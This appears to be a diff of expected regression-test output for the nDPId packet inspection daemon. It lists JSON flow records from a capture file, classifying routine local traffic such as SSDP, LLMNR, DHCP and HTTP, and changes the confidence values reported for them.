{"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1470104378045,"flow_last_seen":1470104423102,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":1596,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.3.95","dst_ip":"239.255.255.250","src_port":59468,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104426992,"flow_last_seen":1470104427094,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"fe80::4568:efbc:40b1:1346","dst_ip":"ff02::1:3","src_port":57148,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 
+00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1470104376301,"flow_last_seen":1470104422690,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":1200,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104391254,"flow_last_seen":1470104391362,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"224.0.0.252","src_port":51714,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1470104380773,"flow_last_seen":1470104381859,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":445,"flow_tot_l4_payload_len":3534,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"203.205.151.234","src_port":49608,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1470104382242,"flow_last_seen":1470104432114,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":1596,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.9","dst_ip":"239.255.255.250","src_port":55484,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1470104382241,"flow_last_seen":1470104432114,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":1330,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.101.33","dst_ip":"239.255.255.250","src_port":55485,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
+00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1470104373232,"flow_last_seen":1470104432419,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":1729,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.44","dst_ip":"239.255.255.250","src_port":51389,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1470104419061,"flow_last_seen":1470104419317,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1157,"flow_tot_l4_payload_len":1833,"flow_avg_l4_payload_len":183,"midstream":1,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"31.13.87.1","dst_ip":"192.168.5.16","src_port":443,"dst_port":53578,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1470104414296,"flow_last_seen":1470104414478,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":3753,"flow_avg_l4_payload_len":417,"midstream":1,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"31.13.87.36","src_port":53580,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00616{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104392072,"flow_last_seen":1470104422079,"flow_idle_time":200000,"flow_min_l4_payload_len":329,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":658,"flow_avg_l4_payload_len":329,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"2001:b020:6::c2a0:bbff:fe73:eb57","dst_ip":"ff02::1","src_port":62976,"dst_port":62976,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00601{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104392072,"flow_last_seen":1470104422079,"flow_idle_time":200000,"flow_min_l4_payload_len":329,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":658,"flow_avg_l4_payload_len":329,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"2001:b020:6::c2a0:bbff:fe73:eb57","dst_ip":"ff02::1","src_port":62976,"dst_port":62976,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00621{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104378657,"flow_last_seen":1470104408662,"flow_idle_time":200000,"flow_min_l4_payload_len":329,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":658,"flow_avg_l4_payload_len":329,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"2001:b030:214:100:c2a0:bbff:fe73:eb47","dst_ip":"ff02::1","src_port":62976,"dst_port":62976,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00606{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104378657,"flow_last_seen":1470104408662,"flow_idle_time":200000,"flow_min_l4_payload_len":329,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":658,"flow_avg_l4_payload_len":329,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"2001:b030:214:100:c2a0:bbff:fe73:eb47","dst_ip":"ff02::1","src_port":62976,"dst_port":62976,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1470104430884,"flow_last_seen":1470104430884,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"224.0.0.252","src_port":49766,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104402624,"flow_last_seen":1470104402724,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"224.0.0.252","src_port":62069,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 
-00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1470104413679,"flow_last_seen":1470104413679,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.41","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1470104397091,"flow_last_seen":1470104397091,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.9","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1470104373741,"flow_last_seen":1470104416751,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":4200,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.119.1","dst_ip":"255.255.255.255","src_port":67,"dst_port":68,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104406717,"flow_last_seen":1470104407128,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.47","dst_ip":"224.0.0.252","src_port":53962,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104409586,"flow_last_seen":1470104409685,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"224.0.0.252","src_port":56043,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 
-00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104406717,"flow_last_seen":1470104407128,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"fe80::edf5:240a:c8c0:8312","dst_ip":"ff02::1:3","src_port":53962,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104408049,"flow_last_seen":1470104408457,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"fe80::e98f:bae2:19f7:6b0f","dst_ip":"ff02::1:3","src_port":51451,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1470104430884,"flow_last_seen":1470104430884,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"224.0.0.252","src_port":49766,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104402624,"flow_last_seen":1470104402724,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"224.0.0.252","src_port":62069,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1470104413679,"flow_last_seen":1470104413679,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.41","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} 
+00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1470104397091,"flow_last_seen":1470104397091,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.9","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1470104373741,"flow_last_seen":1470104416751,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":4200,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.119.1","dst_ip":"255.255.255.255","src_port":67,"dst_port":68,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104406717,"flow_last_seen":1470104407128,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.47","dst_ip":"224.0.0.252","src_port":53962,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104409586,"flow_last_seen":1470104409685,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"224.0.0.252","src_port":56043,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104406717,"flow_last_seen":1470104407128,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"fe80::edf5:240a:c8c0:8312","dst_ip":"ff02::1:3","src_port":53962,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 
+00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104408049,"flow_last_seen":1470104408457,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"fe80::e98f:bae2:19f7:6b0f","dst_ip":"ff02::1:3","src_port":51451,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104405794,"flow_last_seen":1470104405794,"flow_idle_time":200000,"flow_min_l4_payload_len":121,"flow_max_l4_payload_len":121,"flow_tot_l4_payload_len":121,"flow_avg_l4_payload_len":121,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.119.2","dst_ip":"255.255.255.255","src_port":43786,"dst_port":5678,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104405794,"flow_last_seen":1470104405794,"flow_idle_time":200000,"flow_min_l4_payload_len":121,"flow_max_l4_payload_len":121,"flow_tot_l4_payload_len":121,"flow_avg_l4_payload_len":121,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.119.2","dst_ip":"255.255.255.255","src_port":43786,"dst_port":5678,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1470104401187,"flow_last_seen":1470104401187,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"224.0.0.252","src_port":50030,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1470104383810,"flow_last_seen":1470104413817,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":1200,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.119.1","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1470104382448,"flow_last_seen":1470104427503,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":1233,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.49","dst_ip":"239.255.255.250","src_port":51704,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1470104373232,"flow_last_seen":1470104430168,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":1862,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.57","dst_ip":"239.255.255.250","src_port":55809,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104412556,"flow_last_seen":1470104412962,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"fe80::9bd:81dd:2fdc:5750","dst_ip":"ff02::1:3","src_port":64568,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 
-00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104429964,"flow_last_seen":1470104430065,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.57","dst_ip":"224.0.0.252","src_port":64428,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00925{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1470104380890,"flow_last_seen":1470104382084,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":9883,"flow_avg_l4_payload_len":299,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"42.120.51.152","src_port":49609,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
